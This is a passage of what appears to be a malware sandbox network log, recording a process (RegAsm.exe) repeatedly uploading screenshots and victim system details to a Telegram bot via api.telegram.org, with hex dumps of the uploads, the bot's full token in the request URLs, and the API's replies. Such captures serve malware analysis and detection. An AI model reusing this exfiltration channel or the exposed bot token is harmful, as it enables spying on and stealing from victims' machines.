05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                              Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                              2024-05-23 18:25:46 UTC16355OUTData Raw: ec b7 3d 64 91 90 33 c9 ac c7 ff 00 51 ad 7f bc 7f f4 4a 57 1e da c5 cc d6 f6 97 22 53 f6 ab 13 83 93 c3 a1 ef fd 0f ae 45 74 d6 37 a9 a8 69 3a ad dc 60 aa c8 58 e0 f6 22 14 04 7e 62 b3 a9 87 95 28 b6 ff 00 ad 4d 29 e2 23 56 49 2f eb 43 96 a2 8a 5a f6 cf 94 12 8a 28 a0 0a 7a 9f fc 7b af fb e3 f9 1a d1 ff 00 84 7a da 4d 53 4c 8a 29 26 fb 2d dc 1e 73 33 30 dc b8 04 9e 71 8f 4a ce d4 ff 00 e3 dd 7f df 1f c8 d6 ee 9f a9 da af 84 4b c9 3c 62 f2 de 29 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b
                                              Data Ascii: =d3QJW"SEt7i:`X"~b(M)#VI/CZ(z{zMSL)&-s30qJK<b)`yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K
                                              2024-05-23 18:25:46 UTC15447OUTData Raw: 4f f8 46 ec 3f bd 37 fd f4 3f c2 b8 7e bd 4f b3 fe be 67 ab fd 95 5b ba fc 7f c8 e4 28 ae aa e3 c3 d6 31 5b cb 22 b4 d9 44 2c 32 c3 b0 fa 56 2e ab a6 bd 84 d9 19 68 5b ee b7 f4 35 a5 3c 5d 3a 92 e5 5a 18 d6 cb eb 51 8f 3b b3 5e 46 7d 14 51 5d 47 00 51 45 14 00 51 45 74 1e 1f d3 2c ef ac a5 96 e6 22 ee b2 95 07 7b 0e 30 0f 63 ef 58 d6 aa a8 c7 99 a3 a7 0d 87 78 89 b8 27 6d 2e 73 f4 57 69 fd 81 a5 ff 00 cf b1 ff 00 bf af fe 34 7f 60 69 7f f3 ec 7f ef eb ff 00 8d 72 fd 7e 3d 8e ff 00 ec 99 ff 00 32 38 ba 2b 47 50 d2 e4 b7 89 ee a1 05 ad fc d9 14 8e a6 3c 39 03 f0 e3 ad 67 57 55 2a d1 ab 1b c4 f3 f1 18 79 e1 e5 cb 20 a2 8a 2b 63 9c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 29 29 69 28 18 51 45 14 00 51 45 14 00 94 51 45 00 14 51 45 00 14 51 45 03 0a 4a
                                              Data Ascii: OF?7?~Og[(1["D,2V.h[5<]:ZQ;^F}Q]GQEQEt,"{0cXx'm.sWi4`ir~=28+GP<9gWU*y +c(((())i(QEQEQEQEQEJ
                                              2024-05-23 18:25:46 UTC1347OUTData Raw: af 73 e2 7d 72 e2 ea 59 ff 00 b5 6f 22 f3 1c bf 97 15 c3 aa 2e 4e 70 a3 3c 01 da b2 28 a4 06 9c ba e5 f4 f3 c3 3d c4 9e 7c d1 5b 49 6d e6 4a 59 99 95 c3 82 49 27 92 04 87 1f 41 59 94 51 40 05 14 51 40 05 75 d3 78 c6 2b 98 e2 49 6d 1e 3f 2d 70 0a b0 6c ff 00 2c 74 ae 46 8a 49 2e 75 3e ab 60 7a c5 c7 a3 3b 29 bc 6d 0c f1 79 4d a6 98 81 ea eb 20 63 f9 60 7f 3a cf d6 7c 4a ba 8e 90 ba 72 5b 32 aa b8 71 23 37 27 19 ed 8f 7f 5a e7 68 ac e3 46 11 8a 82 5a 27 7e bb 94 e6 dc b9 ba da c1 45 14 56 a4 85 6f 69 5a b2 08 96 09 db 63 2f 0a de a2 b0 68 a9 94 54 95 99 13 82 9a b3 3d 33 4d d4 ee ee 5b 6b de 6d 81 06 5e 43 b4 1c 7a 6e eb fa d6 57 8a bc 4f 04 96 af 61 61 20 90 c8 31 24 8b d0 0f 41 eb 5c 45 15 c8 f0 6a 75 55 4a 8e f6 d9 1b 52 9b a5 4d c1 75 ea 14 51 45 77 10
                                              Data Ascii: s}rYo".Np<(=|[ImJYI'AYQ@Q@ux+Im?-pl,tFI.u>`z;)myM c`:|Jr[2q#7'ZhFZ'~EVoiZc/hT=3M[km^CznWOaa 1$A\EjuUJRMuQEw
                                              2024-05-23 18:25:46 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 33 63 33 33 35 30 37 63 61 38 33 2d 2d 0d 0a
                                              Data Ascii: -----------------------------8dc93c33507ca83--
                                              2024-05-23 18:25:46 UTC25INHTTP/1.1 100 Continue
                                              2024-05-23 18:25:47 UTC1494INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 23 May 2024 18:25:47 GMT
                                              Content-Type: application/json
                                              Content-Length: 1105
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              {"ok":true,"result":{"message_id":261,"from":{"id":6814314158,"is_bot":true,"first_name":"oba","username":"ObaK_bot"},"chat":{"id":7153133538,"first_name":"KGB CRYPTO","username":"KGB_cryptor_admin","type":"private"},"date":1716488747,"document":{"file_name":"user-715575 2024-06-23 20-29-39.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAgEFZk-KKrPAgYA8XxBmuIVBNUhs7MgAArsTAALx64FSZvkrOU9_KGQBAAdtAAM1BA","file_unique_id":"AQADuxMAAvHrgVJy","file_size":12370,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAgEFZk-KKrPAgYA8XxBmuIVBNUhs7MgAArsTAALx64FSZvkrOU9_KGQBAAdtAAM1BA","file_unique_id":"AQADuxMAAvHrgVJy","file_size":12370,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAIBBWZPiiqzwIGAPF8QZriFQTVIbOzIAAK7EwAC8euBUmb5KzlPfyhkNQQ","file_unique_id":"AgADuxMAAvHrgVI","file_size":66304},"caption":"New SC Recovered!\n\nTime: 06/23/2024 19:38:25\nUser Name: user/715575\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Addr [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.749724149.154.167.2204435896C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-23 18:25:48 UTC238OUTPOST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=---------------------------8dc96187756500a
                                              Host: api.telegram.org
                                              Content-Length: 66933
                                              Expect: 100-continue
                                              2024-05-23 18:25:48 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 36 31 38 37 37 35 36 35 30 30 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 35 33 31 33 33 35 33 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 36 31 38 37 37 35 36 35 30 30 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 36 2f 32 36 2f 32 30 32 34 20 31 39 3a 34 34 3a 35 39 0a 55 73 65 72
                                              Data Ascii: -----------------------------8dc96187756500aContent-Disposition: form-data; name="chat_id"7153133538-----------------------------8dc96187756500aContent-Disposition: form-data; name="caption"New SC Recovered!Time: 06/26/2024 19:44:59User
                                              2024-05-23 18:25:48 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                              Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                              2024-05-23 18:25:48 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                              Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                              2024-05-23 18:25:48 UTC16355OUTData Raw: ec b7 3d 64 91 90 33 c9 ac c7 ff 00 51 ad 7f bc 7f f4 4a 57 1e da c5 cc d6 f6 97 22 53 f6 ab 13 83 93 c3 a1 ef fd 0f ae 45 74 d6 37 a9 a8 69 3a ad dc 60 aa c8 58 e0 f6 22 14 04 7e 62 b3 a9 87 95 28 b6 ff 00 ad 4d 29 e2 23 56 49 2f eb 43 96 a2 8a 5a f6 cf 94 12 8a 28 a0 0a 7a 9f fc 7b af fb e3 f9 1a d1 ff 00 84 7a da 4d 53 4c 8a 29 26 fb 2d dc 1e 73 33 30 dc b8 04 9e 71 8f 4a ce d4 ff 00 e3 dd 7f df 1f c8 d6 ee 9f a9 da af 84 4b c9 3c 62 f2 de 29 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b
                                              Data Ascii: =d3QJW"SEt7i:`X"~b(M)#VI/CZ(z{zMSL)&-s30qJK<b)`yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K
                                              2024-05-23 18:25:48 UTC15447OUTData Raw: 4f f8 46 ec 3f bd 37 fd f4 3f c2 b8 7e bd 4f b3 fe be 67 ab fd 95 5b ba fc 7f c8 e4 28 ae aa e3 c3 d6 31 5b cb 22 b4 d9 44 2c 32 c3 b0 fa 56 2e ab a6 bd 84 d9 19 68 5b ee b7 f4 35 a5 3c 5d 3a 92 e5 5a 18 d6 cb eb 51 8f 3b b3 5e 46 7d 14 51 5d 47 00 51 45 14 00 51 45 74 1e 1f d3 2c ef ac a5 96 e6 22 ee b2 95 07 7b 0e 30 0f 63 ef 58 d6 aa a8 c7 99 a3 a7 0d 87 78 89 b8 27 6d 2e 73 f4 57 69 fd 81 a5 ff 00 cf b1 ff 00 bf af fe 34 7f 60 69 7f f3 ec 7f ef eb ff 00 8d 72 fd 7e 3d 8e ff 00 ec 99 ff 00 32 38 ba 2b 47 50 d2 e4 b7 89 ee a1 05 ad fc d9 14 8e a6 3c 39 03 f0 e3 ad 67 57 55 2a d1 ab 1b c4 f3 f1 18 79 e1 e5 cb 20 a2 8a 2b 63 9c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 29 29 69 28 18 51 45 14 00 51 45 14 00 94 51 45 00 14 51 45 00 14 51 45 03 0a 4a
                                              Data Ascii: OF?7?~Og[(1["D,2V.h[5<]:ZQ;^F}Q]GQEQEt,"{0cXx'm.sWi4`ir~=28+GP<9gWU*y +c(((())i(QEQEQEQEQEJ
                                              2024-05-23 18:25:48 UTC1347OUTData Raw: af 73 e2 7d 72 e2 ea 59 ff 00 b5 6f 22 f3 1c bf 97 15 c3 aa 2e 4e 70 a3 3c 01 da b2 28 a4 06 9c ba e5 f4 f3 c3 3d c4 9e 7c d1 5b 49 6d e6 4a 59 99 95 c3 82 49 27 92 04 87 1f 41 59 94 51 40 05 14 51 40 05 75 d3 78 c6 2b 98 e2 49 6d 1e 3f 2d 70 0a b0 6c ff 00 2c 74 ae 46 8a 49 2e 75 3e ab 60 7a c5 c7 a3 3b 29 bc 6d 0c f1 79 4d a6 98 81 ea eb 20 63 f9 60 7f 3a cf d6 7c 4a ba 8e 90 ba 72 5b 32 aa b8 71 23 37 27 19 ed 8f 7f 5a e7 68 ac e3 46 11 8a 82 5a 27 7e bb 94 e6 dc b9 ba da c1 45 14 56 a4 85 6f 69 5a b2 08 96 09 db 63 2f 0a de a2 b0 68 a9 94 54 95 99 13 82 9a b3 3d 33 4d d4 ee ee 5b 6b de 6d 81 06 5e 43 b4 1c 7a 6e eb fa d6 57 8a bc 4f 04 96 af 61 61 20 90 c8 31 24 8b d0 0f 41 eb 5c 45 15 c8 f0 6a 75 55 4a 8e f6 d9 1b 52 9b a5 4d c1 75 ea 14 51 45 77 10
                                              Data Ascii: s}rYo".Np<(=|[ImJYI'AYQ@Q@ux+Im?-pl,tFI.u>`z;)myM c`:|Jr[2q#7'ZhFZ'~EVoiZc/hT=3M[km^CznWOaa 1$A\EjuUJRMuQEw
                                              2024-05-23 18:25:48 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 36 31 38 37 37 35 36 35 30 30 61 2d 2d 0d 0a
                                              Data Ascii: -----------------------------8dc96187756500a--
                                              2024-05-23 18:25:48 UTC25INHTTP/1.1 100 Continue
                                              2024-05-23 18:25:48 UTC1494INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 23 May 2024 18:25:48 GMT
                                              Content-Type: application/json
                                              Content-Length: 1105
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              {"ok":true,"result":{"message_id":262,"from":{"id":6814314158,"is_bot":true,"first_name":"oba","username":"ObaK_bot"},"chat":{"id":7153133538,"first_name":"KGB CRYPTO","username":"KGB_cryptor_admin","type":"private"},"date":1716488748,"document":{"file_name":"user-715575 2024-06-26 19-45-00.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAgEGZk-KLECzwAp-3trXXppotpL9-DYAArwTAALx64FShlVhnPkobmQBAAdtAAM1BA","file_unique_id":"AQADvBMAAvHrgVJy","file_size":12370,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAgEGZk-KLECzwAp-3trXXppotpL9-DYAArwTAALx64FShlVhnPkobmQBAAdtAAM1BA","file_unique_id":"AQADvBMAAvHrgVJy","file_size":12370,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAIBBmZPiixAs8AKft7a116aaLaS_fg2AAK8EwAC8euBUoZVYZz5KG5kNQQ","file_unique_id":"AgADvBMAAvHrgVI","file_size":66304},"caption":"New SC Recovered!\n\nTime: 06/26/2024 19:44:59\nUser Name: user/715575\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Addr [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.749725149.154.167.2204435896C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-23 18:25:49 UTC238OUTPOST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=---------------------------8dc98fdd89be5d8
                                              Host: api.telegram.org
                                              Content-Length: 66933
                                              Expect: 100-continue
                                              2024-05-23 18:25:49 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 38 66 64 64 38 39 62 65 35 64 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 35 33 31 33 33 35 33 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 38 66 64 64 38 39 62 65 35 64 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 36 2f 33 30 2f 32 30 32 34 20 31 32 3a 30 31 3a 35 37 0a 55 73 65 72
                                              Data Ascii: -----------------------------8dc98fdd89be5d8Content-Disposition: form-data; name="chat_id"7153133538-----------------------------8dc98fdd89be5d8Content-Disposition: form-data; name="caption"New SC Recovered!Time: 06/30/2024 12:01:57User
                                              2024-05-23 18:25:49 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                              Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                              2024-05-23 18:25:49 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                              Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                              2024-05-23 18:25:49 UTC16355OUTData Raw: ec b7 3d 64 91 90 33 c9 ac c7 ff 00 51 ad 7f bc 7f f4 4a 57 1e da c5 cc d6 f6 97 22 53 f6 ab 13 83 93 c3 a1 ef fd 0f ae 45 74 d6 37 a9 a8 69 3a ad dc 60 aa c8 58 e0 f6 22 14 04 7e 62 b3 a9 87 95 28 b6 ff 00 ad 4d 29 e2 23 56 49 2f eb 43 96 a2 8a 5a f6 cf 94 12 8a 28 a0 0a 7a 9f fc 7b af fb e3 f9 1a d1 ff 00 84 7a da 4d 53 4c 8a 29 26 fb 2d dc 1e 73 33 30 dc b8 04 9e 71 8f 4a ce d4 ff 00 e3 dd 7f df 1f c8 d6 ee 9f a9 da af 84 4b c9 3c 62 f2 de 29 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b
                                              Data Ascii: =d3QJW"SEt7i:`X"~b(M)#VI/CZ(z{zMSL)&-s30qJK<b)`yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K
                                              2024-05-23 18:25:49 UTC15447OUTData Raw: 4f f8 46 ec 3f bd 37 fd f4 3f c2 b8 7e bd 4f b3 fe be 67 ab fd 95 5b ba fc 7f c8 e4 28 ae aa e3 c3 d6 31 5b cb 22 b4 d9 44 2c 32 c3 b0 fa 56 2e ab a6 bd 84 d9 19 68 5b ee b7 f4 35 a5 3c 5d 3a 92 e5 5a 18 d6 cb eb 51 8f 3b b3 5e 46 7d 14 51 5d 47 00 51 45 14 00 51 45 74 1e 1f d3 2c ef ac a5 96 e6 22 ee b2 95 07 7b 0e 30 0f 63 ef 58 d6 aa a8 c7 99 a3 a7 0d 87 78 89 b8 27 6d 2e 73 f4 57 69 fd 81 a5 ff 00 cf b1 ff 00 bf af fe 34 7f 60 69 7f f3 ec 7f ef eb ff 00 8d 72 fd 7e 3d 8e ff 00 ec 99 ff 00 32 38 ba 2b 47 50 d2 e4 b7 89 ee a1 05 ad fc d9 14 8e a6 3c 39 03 f0 e3 ad 67 57 55 2a d1 ab 1b c4 f3 f1 18 79 e1 e5 cb 20 a2 8a 2b 63 9c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 29 29 69 28 18 51 45 14 00 51 45 14 00 94 51 45 00 14 51 45 00 14 51 45 03 0a 4a
                                              Data Ascii: OF?7?~Og[(1["D,2V.h[5<]:ZQ;^F}Q]GQEQEt,"{0cXx'm.sWi4`ir~=28+GP<9gWU*y +c(((())i(QEQEQEQEQEJ
                                              2024-05-23 18:25:49 UTC1347OUTData Raw: af 73 e2 7d 72 e2 ea 59 ff 00 b5 6f 22 f3 1c bf 97 15 c3 aa 2e 4e 70 a3 3c 01 da b2 28 a4 06 9c ba e5 f4 f3 c3 3d c4 9e 7c d1 5b 49 6d e6 4a 59 99 95 c3 82 49 27 92 04 87 1f 41 59 94 51 40 05 14 51 40 05 75 d3 78 c6 2b 98 e2 49 6d 1e 3f 2d 70 0a b0 6c ff 00 2c 74 ae 46 8a 49 2e 75 3e ab 60 7a c5 c7 a3 3b 29 bc 6d 0c f1 79 4d a6 98 81 ea eb 20 63 f9 60 7f 3a cf d6 7c 4a ba 8e 90 ba 72 5b 32 aa b8 71 23 37 27 19 ed 8f 7f 5a e7 68 ac e3 46 11 8a 82 5a 27 7e bb 94 e6 dc b9 ba da c1 45 14 56 a4 85 6f 69 5a b2 08 96 09 db 63 2f 0a de a2 b0 68 a9 94 54 95 99 13 82 9a b3 3d 33 4d d4 ee ee 5b 6b de 6d 81 06 5e 43 b4 1c 7a 6e eb fa d6 57 8a bc 4f 04 96 af 61 61 20 90 c8 31 24 8b d0 0f 41 eb 5c 45 15 c8 f0 6a 75 55 4a 8e f6 d9 1b 52 9b a5 4d c1 75 ea 14 51 45 77 10
                                              Data Ascii: s}rYo".Np<(=|[ImJYI'AYQ@Q@ux+Im?-pl,tFI.u>`z;)myM c`:|Jr[2q#7'ZhFZ'~EVoiZc/hT=3M[km^CznWOaa 1$A\EjuUJRMuQEw
                                              2024-05-23 18:25:49 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 38 66 64 64 38 39 62 65 35 64 38 2d 2d 0d 0a
                                              Data Ascii: -----------------------------8dc98fdd89be5d8--
                                              2024-05-23 18:25:49 UTC25INHTTP/1.1 100 Continue
                                              2024-05-23 18:25:50 UTC1494INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 23 May 2024 18:25:50 GMT
                                              Content-Type: application/json
                                              Content-Length: 1105
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
